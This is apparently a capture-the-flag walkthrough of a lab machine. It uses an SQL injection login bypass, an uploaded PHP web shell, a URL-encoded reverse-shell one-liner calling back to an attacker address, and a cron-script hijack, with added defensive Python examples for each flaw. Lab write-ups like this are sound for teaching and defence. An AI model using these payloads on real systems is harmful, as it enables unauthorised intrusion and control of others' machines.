PlottedTMS

Target IP: 10.10.22.19

Everything here is plotted! Enumeration is key!


Scanning

[screenshot]
[screenshot]
There are three TCP ports open on the target machine: SSH on 22, HTTP on 80, and a second HTTP service on 445.


Enumeration

Port 445: HTTP
[screenshot]
Doing a directory search against this port shows the interesting directory /management, as shown above.

[screenshot]
The webpage of /management is shown above. I do not have the credentials. I did try default credentials, such as admin:admin, but they did not work.

[screenshot]
However, this website is vulnerable to SQL injection. Using the payload admin' OR '1'='1' -- // as the input for the username, I bypassed the authentication mechanism. Now I have access to the web application on this port as the user admin.
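The login bypass above works because the username is spliced into the SQL text, so the closing quote and the `--` comment rewrite the query. The following added example (not code from the write-up or from the target application; the two-column users table and the SQLite backend are assumptions for illustration) shows the concatenated query beside the parameterised one, run against the exact payload from the text:

```python
import sqlite3

# Constructed stand-in for the /management login backend. The real schema is not on the
# page; a two-column users table with one account is assumed purely for illustration.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn

def render_vulnerable_sql(username, password):
    """The query text a concatenating login handler would actually send to the database."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_vulnerable(conn, username, password):
    """Username and password become part of the SQL grammar, so '--' comments out the
    password check and OR '1'='1' makes the WHERE clause true for every row."""
    row = conn.execute(render_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Same query with bound parameters: the input is compared as data, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

PAYLOAD = "admin' OR '1'='1' -- //"   # the username value used in the write-up

if __name__ == "__main__":
    db = build_db()
    print(render_vulnerable_sql(PAYLOAD, "wrong"))
    print("vulnerable login returns:", login_vulnerable(db, PAYLOAD, "wrong"))
    print("parameterised login returns:", login_safe(db, PAYLOAD, "wrong"))
```

With the bound-parameter version the whole payload is looked up as a literal username, which matches nothing; the fix is the query shape, not filtering of quote characters.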

[screenshot]
The User List feature can be used to change the user account details. I noticed that the profile picture of the admin user can be changed to any file, as all file types are accepted, including PHP!

[screenshot]
I created a simple PHP web shell and changed the avatar picture of the user admin to this web shell, shell.php. The upload succeeded, but where is my shell?

[screenshot]
I found the location of my uploaded web shell while doing a source-code review. It was uploaded to /management/uploads with the file name 1691847900_shell.php.
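The avatar upload accepts any extension and keeps the client's file name (prefixed with a timestamp) inside the web root, which is what turns an image upload into code execution. The added example below is not the application's code; it shows the server-side check a defender would want: an allowlist of image extensions, magic bytes that must agree with the extension, and a stored name that carries nothing chosen by the client. The magic-byte table and function name are assumptions for illustration.

```python
import os
import secrets

# Allowed avatar types, each paired with the leading bytes a genuine file of that type has.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def validate_avatar(original_name, content):
    """Return (accepted, detail). On success, detail is the randomised name to store under."""
    base = os.path.basename(original_name)          # drop any directory components
    if "." not in base:
        return False, "no file extension"
    ext = base.rsplit(".", 1)[1].lower()            # only the last extension counts
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_TYPES:                    # allowlist, never a denylist of .php etc.
        return False, "extension ." + ext + " is not an allowed image type"
    if not content.startswith(ALLOWED_TYPES[ext]):  # the bytes must agree with the extension
        return False, "content does not look like a ." + ext + " image"
    # Nothing from the client survives into the stored name: no original name, no chosen extension.
    return True, secrets.token_hex(16) + "." + ext

if __name__ == "__main__":
    # Constructed sample uploads: a PHP file, a PHP file renamed to .png, and a real PNG header.
    for name, data in [("shell.php", b"<?php phpinfo(); ?>"),
                       ("shell.png", b"<?php phpinfo(); ?>"),
                       ("avatar.png", b"\x89PNG\r\n\x1a\n" + bytes(32))]:
        print(name, "->", validate_avatar(name, data))
```

Even with this check in place, the uploads directory should not execute scripts: serve it from outside the web root or disable the interpreter for that directory in the web server configuration (with mod_php, `php_admin_flag engine off` in the directory block), so a validation bug cannot become a web shell.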

[screenshot]
And bingo! Sending the payload id;whoami, I received the output above. Time to upgrade this to a reverse shell connection!


Exploitation

[screenshot]
Since the target machine is already running PHP, I can use a PHP reverse shell. The URL-encoded PHP reverse shell one-liner I used is php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
I started a listener on port 8444 and deployed the payload. Then I received a reverse shell connection on port 8444! Now I have a foothold on the target machine.
The full URL with PHP payload: http://10.10.22.19:445/management/uploads/1691847900_shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27


Privilege Escalation

[screenshot]
The file initialize.php contains the database credentials tms_user:Password@123.

[screenshot]
After running the command find / -perm -u=s 2>/dev/null, I noticed an interesting binary, /usr/bin/doas. After enumerating this binary further, I noticed that the user plot_admin can run the command openssl with root privileges without entering a password. Now I need to escalate my privileges to this user.

[screenshot]
Using the credentials tms_user:Password@123, I gained access to the MySQL service on the target machine. There is a database called tms_db with an interesting table called users. This table contains the two entries above. Is puser the same account as plot_admin?

[screenshot]
I cracked the password hash 1254737c076cf867dc53d60a0364f38e using CrackStation. This gave me the password jsmith123, as shown above. However, this password did not work against the user plot_admin.
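That the hash fell to an online lookup table says the application stores passwords as a fast, unsalted digest (the 32-hex-character value is consistent with MD5, though the page does not state the algorithm). The added example below is not the application's code; it contrasts an unsalted digest, which is identical for every user with the same password and therefore precomputable, with a salted, iterated PBKDF2 hash and a constant-time verifier. The storage format string is an assumption for illustration.

```python
import hashlib
import hmac
import os

def md5_unsalted(password):
    """What a lookup table exploits: the same password always yields the same digest,
    so one precomputed table serves every site and every user."""
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password, iterations=600_000, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt. Returns a self-describing string
    (assumed format: algorithm$iterations$salt_hex$hash_hex) so parameters can be raised later."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    pw = "jsmith123"   # the recovered password from the write-up, used as constructed input
    print("unsalted md5, twice:", md5_unsalted(pw), md5_unsalted(pw))
    a, b = hash_password(pw), hash_password(pw)
    print("salted pbkdf2, twice:", a == b)            # False: each record gets its own salt
    print("verify:", verify_password(pw, a), verify_password("jsmith124", a))
```

Two users with the same password now have unrelated records, and each guess costs an attacker the full iteration count, which is what makes offline recovery expensive rather than a table lookup.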

[screenshot]
[screenshot]
After some more enumeration, I found an interesting cron job that is executed by the plot_admin user. I cannot modify the script itself; however, I can modify the contents of the directory in which the script resides.

[screenshot]
I renamed the original backup.sh to backup_old.sh. Then I placed my reverse shell script inside backup.sh and changed its permissions to 777 so it would be executable. I started a listener on 8445, and after some time I got a connection back with a session as plot_admin!
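The script itself was read-only, yet it could be swapped out because its parent directory was writable by a lower-privileged account; a permission check that only looks at the file misses this. The added example below (not part of the write-up, and not a tool from the target) audits a cron-executed script by walking every directory above it, flagging group- or world-writable directories without the sticky bit and any path component not owned by root or the expected user. The `demo()` function builds two constructed layouts in a temporary directory to show a clean and a vulnerable case.

```python
import os
import stat
import tempfile

GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH

def audit_cron_script(script_path, expected_uid):
    """Return findings for a script that a privileged cron job runs. expected_uid is the
    uid that, besides root, may own the script and the directories above it."""
    findings = []
    path = os.path.abspath(script_path)
    st = os.stat(path)
    if st.st_uid not in (0, expected_uid):
        findings.append(f"{path}: owned by uid {st.st_uid}, expected {expected_uid} or root")
    if st.st_mode & GROUP_OR_WORLD_WRITE:
        findings.append(f"{path}: script is group/world-writable")
    # A writable parent directory is as bad as a writable script: the file can be renamed
    # and replaced wholesale, regardless of the script's own permissions.
    directory = os.path.dirname(path)
    while True:
        st = os.stat(directory)
        if st.st_uid not in (0, expected_uid):
            findings.append(f"{directory}: owned by uid {st.st_uid}, expected {expected_uid} or root")
        writable = st.st_mode & GROUP_OR_WORLD_WRITE
        sticky = st.st_mode & stat.S_ISVTX   # /tmp-style: others cannot rename your files
        if writable and not sticky:
            findings.append(f"{directory}: directory is group/world-writable, script can be replaced")
        parent = os.path.dirname(directory)
        if parent == directory:              # reached the filesystem root
            break
        directory = parent
    return findings

def demo():
    """Build two constructed layouts (locked-down and writable directory) and audit each.
    Returns {label: findings restricted to the constructed tree}."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        me = os.getuid()
        for label, dir_mode in (("locked_down", 0o755), ("writable_dir", 0o777)):
            d = os.path.join(base, label)
            os.mkdir(d)
            os.chmod(d, dir_mode)            # mkdir applies the umask; set the mode explicitly
            script = os.path.join(d, "backup.sh")
            with open(script, "w") as f:     # constructed placeholder script, never executed
                f.write("#!/bin/sh\necho backup placeholder\n")
            os.chmod(script, 0o755)
            # Keep only findings about the constructed tree, not about the host's own /tmp parents.
            results[label] = [f for f in audit_cron_script(script, me) if f.startswith(d)]
    return results

if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, "->", findings or ["no findings"])
```

Run against a real cron entry, pass the cron user's uid as `expected_uid` and review every line the function returns; the fix for the case in the write-up is to make the script's directory owned by root (or the cron user) with mode 755.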

[screenshot]
From previous enumeration, I found the binary doas. I used this to read the root.txt flag. GG.


Flags

[screenshot]
The user.txt flag.

[screenshot]
The root.txt hash.